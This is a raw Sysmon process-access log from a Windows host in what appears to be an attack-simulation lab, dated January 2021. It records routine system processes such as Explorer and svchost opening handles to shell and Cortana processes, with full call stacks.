13:30:10.217{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8fcc|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6446|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011085Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.217{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8fcc|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9a54|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9af1|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+63fd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e 10341000x800000000000000011084Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.217{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8fcc|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9ac5|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+63fd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000011083Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.217{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8fcc|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9a54|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9af1|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+4aab|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+703f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e 10341000x800000000000000011082Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.217{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8fcc|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9ac5|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+4aab|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+703f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e 10341000x800000000000000011081Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.217{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011080Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.217{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011079Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.201{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011078Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.201{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011077Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.201{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011076Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.201{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011075Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.201{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011074Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.201{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011073Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.170{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f42ac|C:\Windows\System32\TwinUI.dll+f440a|C:\Windows\System32\TwinUI.dll+f4995|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9d35|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011072Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.170{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f42ac|C:\Windows\System32\TwinUI.dll+f440a|C:\Windows\System32\TwinUI.dll+f4995|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9d35|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011071Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.170{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011070Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.170{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011069Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.107{08A6967A-4750-6000-0205-000000009A01}47883780C:\Windows\system32\csrss.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011068Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.107{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+f967|C:\Windows\SYSTEM32\psmserviceexthost.dll+fa6b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1276f|C:\Windows\SYSTEM32\psmserviceexthost.dll+16952|C:\Windows\SYSTEM32\resourcepolicyserver.dll+15142|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11b0c|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b955|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000011067Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.107{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+3844|C:\Windows\SYSTEM32\psmserviceexthost.dll+146dc|C:\Windows\SYSTEM32\psmserviceexthost.dll+f903|C:\Windows\SYSTEM32\psmserviceexthost.dll+fa6b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1276f|C:\Windows\SYSTEM32\psmserviceexthost.dll+16952|C:\Windows\SYSTEM32\resourcepolicyserver.dll+15142|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11b0c|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b955|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011066Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.107{08A6967A-4753-6000-0E05-000000009A01}23361036C:\Windows\system32\sihost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+18d08|C:\Windows\System32\modernexecserver.dll+18fa1|C:\Windows\System32\modernexecserver.dll+2c49a|C:\Windows\System32\modernexecserver.dll+31f08|C:\Windows\SYSTEM32\twinapi.appcore.dll+3d8f7|C:\Windows\SYSTEM32\twinapi.appcore.dll+3d700|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011065Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.107{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011064Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.107{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+4401|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84